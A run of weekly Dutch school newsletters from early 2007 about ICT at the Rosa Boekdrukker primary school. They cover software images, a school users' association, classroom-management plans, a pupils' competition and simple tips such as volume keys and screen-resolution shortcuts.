++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 3 - 2007 (19 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

BEELDBANK (nee, niet die tegen diefstal van beelden!)

Op de eerste en tweede verdieping hebben we images teruggezet. Daar werkt nu de beeldbank van schooltv. Volgende week woensdagmidag is de begane grond aan de beurt.

EDUCAT-b UITLEEN

Op een gegeven moment waren er geen moeders om de bibliotheekboeken te ruilen. Een paar erg zelfstandige kinderen uit groep 6 zetten zelf de computer aan en regelden het. En ze deden het helemaal goed. Hier een foto van hen.

MET WOORDEN IN DE WEER

Voor de leden van de werkgroep MWidW & ICT is er een website met daarop een experimenteel formulier 'invuschema semantiseren' zoals dat op pagina 96 van het MWidW' methodeboek beschreven is. De leden experimenteren.

SCHOLEN TEZAMEN RIJK MET ICT

De gebruikersvereniging STRICT (zie http://serveropschool.nl) hield zijn eerste algemene ledenvergadering. Vrijwel iedereen was aanwezig. George verblijdde ons allen omdat hij de naam 'strict.nu' geregistreerd had.   De vergadering nam besluiten over contributie en entreegeld (beiden zeer laag),  stelde enkele commissies in (techniek, huishoudekijk reglement, PR) en besloot tot effectief vergaderen via e-mail lijsten.

KLASSENMANAGEMENT EN ICT

Deze week zijn de plannen aangescherpt: wat we gaan doen om de computers beter te integreren in het onderwijs. Er zullen opdrachten worden gegeven. Elke twee weken vergaderen Gerard en Karin op maandagmorgen. Dan worden opdrachten bedacht en worden vergaderingen en andere tijdstippen gepland voor overleg over de vorderingen in de klassen. Ook zal onze begeleidster van de cursus 'klassenmanagement' wijzen op de mogelijkheden van ICT-gebruik voor onze organisatie van zelfstandig werken in de klassen.
En vanuit ICT-OP-SCHOOL zijn we nu gekoppeld aan een aantal weetscholen. Daar gaan we kijken met gerichte vragen. Volgende week moeten die vragen worden gemaakt.
Binnenkort komt er ook een website waar alle scholen hun vragen en vorderingen op kunnen publiceren.

TREDIN

Onze ARBO dienst verordonneerde iets als: "Jullie moeten ActiveSwing installeren". Wij: "Hoe? Wat? Waarom?" Toen bleek weer het voordeel van STRICT (zie boven). De drie STRICT leden  in de Baarsjes  staken de koppen bij elkaar, gaven Peter de opdracht de zaak te regelen en deelden de kosten. Resultaat: iedere school betaalde slechts éénderde!

TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK

Deze week maar eens geen techniek. Of zijn we wat vergeten?

Groeten en goed weekend,
Karin
Dirk

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen?  Mail naar info@rosaboekdrukker.nl. Even niet via de 'Bijdrage' knop, want daar hebben we een probleempje mee.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen? Klik dan HIER om dat te doen. Liever niet mailen, dat kost de redactie teveel tijd.

2007-01-26 w04

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 4 - 2007 (26 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

We hebben een drukke week gehad, dus een korte nieuwbrief.

GELUID HARDER/ZACHTER OP DE ROSA BOEKDRUKKER

Sommige programma's nemen het hele beelscherm in beslag waardoor je niet meer bij het geluid kan om dat harder/zachter te zetten. Je kunt het geluid harder zetten door de ALT toets ingedrukt te houden en dan de + toets in te drukken voor harder en de - toets voor zachter.

INTRANET OP DE ROSA B

Collega's, het is erg belangrijk regelmatig op het intranet te kijken, want onze directeur zet daar wel eens  mededelingen die niet in de postvakjes komen. Van de week, tijdens een vergadering, bleek, dat enkele collega's hun wachtwoorden niet meer weten. Meld dat bij de afdeling ICT en wij helpen je verder.

VERDWIJNINGEN

Deze week was er ergens een muis weg en ergens anders een koptelefoon. Graag in de gaten houden!!

TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK

SITE@SCHOOL

Al een tijd niks van gehoord, maar volgende week goed nieuws!

SERVERATSCHOOL

Ook daar was het stil, maar er werd ook niet stil gezeten. Volgende week meer.

Er wordt hier trouwens nooit stil gezeten.

Groeten en goed weekend,
Karin
Dirk

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen?  Mail naar info@rosaboekdrukker.nl. Even niet via de 'Bijdrage' knop, want daar hebben we een probleempje mee.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen? Klik dan HIER om dat te doen. Liever niet mailen, dat kost de redactie teveel tijd.

2007-02-02 w05

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 5 - 2007 (2 februari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

KLASSENMANAGEMENT EN ICT

Deze week zijn de collega's geïnformeerd over de afspraken en opdrachten die we maakten voor het project. Ook zijn er meteen afspraken gemaakt om in een klein gesprekje door te nemen of de collega's weten wat ze moeten doen. Waarschijnlijk is dat cruciaal om te waarborgen, dat men aan de slag gaat.
Ook tijdens de vergadering met de klassenmanagement-begeleidster van onze schoolbegeleidingsdienst, kwam de rol van ICT aan bod. We gaan proberen om tijdens de zelfstandige werktijden de computer gerichter in te zetten.

JEUGDKRAKER COMPETITIE

Vandaag hebben 8 teams uit groep 8 meegedaan aan de voorronde voor de jeugdkrakercompetitie. Volgende week zullen twee teams worden geselecteerd om de Rosa Boekdrukker te vertegenwoordigen.

TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK

SITE@SCHOOL

Vorige week beloofden we goed nieuws. Nou, dat is er! Site@School krijgt versterking in de vorm van twee nieuwe teamleden: Barry en Peter. Wie wil ons team nog meer komen versterken? We kunnen vooral mensen gebruiken die goed PHP kunnen schrijven en ervaring hebben met  OO. Er is een (bescheiden) vergoeding mogelijk.

Groeten en goed weekend,
Karin
Dirk

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen?  Mail naar info@rosaboekdrukker.nl. Even niet via de 'Bijdrage' knop, want daar hebben we een probleempje mee.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

Vragen naar aanleiding van de inhoud? Een bijdrage leveren? Nieuwsbrief opzeggen? Klik dan HIER om dat te doen. Liever niet mailen, dat kost de redactie teveel tijd.

2007-02-08 w06

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 6 - 2007 (9 februari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

KLASSENMANAGEMENT EN ICT

Elke week is er op maandagochtend voortgangsoverleg over ICT op de Rosa Boekdrukker met de directeur. Deze week bespraken we de voortgang van de gesprekken met de leerkrachten over de opdachten voor het gebruik van de computers in de taakuren.
Met iedereen wordt doorgenomen, wat er gedaan/geprobeerd gaat worden en hoe het in de klas georganiseerd wordt. Aan de orde is al gekomen, dat de webkwesties van tevoren moeten worden uitgezocht, omdat er webkwesties tussen zitten die veel tijd vergen, of veel organisatie/hulp van de leerkracht. We willen graag suggesties uit het land: welke webkwesties zijn leuk???

Ook het vervolg voor de jeugdkrakercompetitie kwam aan de orde. Twee teams zullen strijden voor de Rosa Boekdrukker. Team 1 bestaat uit Danique en Keolani, team 2 uit Thomàs en Abdel.

TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK-TECHNIEK

BEELDSCHERMRESOLUTIE

Veel educatieve software werkt met een beeldschermresolutie van 800 x 600. Oude software zelfs met een nog lagere resolutie. Met QRes (standaard in ServerAtSchool) kun je programma's laten starten met de goede resolutie.  Veel websites werken met 1024 x 768, of lager, of hoger.... Met de hand wisselen van  resolutie blijkt voor sommige  leerkrachten toch nog ingewikkeld. Oplossing:  we maakten twee icoontjes in de taakbalk waarmee je met één klik kunt wisselen tussen twee resoluties.
Het icoon maakten we met BMPtoICO (freeware, overal op internet) en we poetsten 'm een beetje op met Icon Suite (idem). Dit werkt pas op alle stations bij de upload van een nieuw image.

Groeten en goed weekend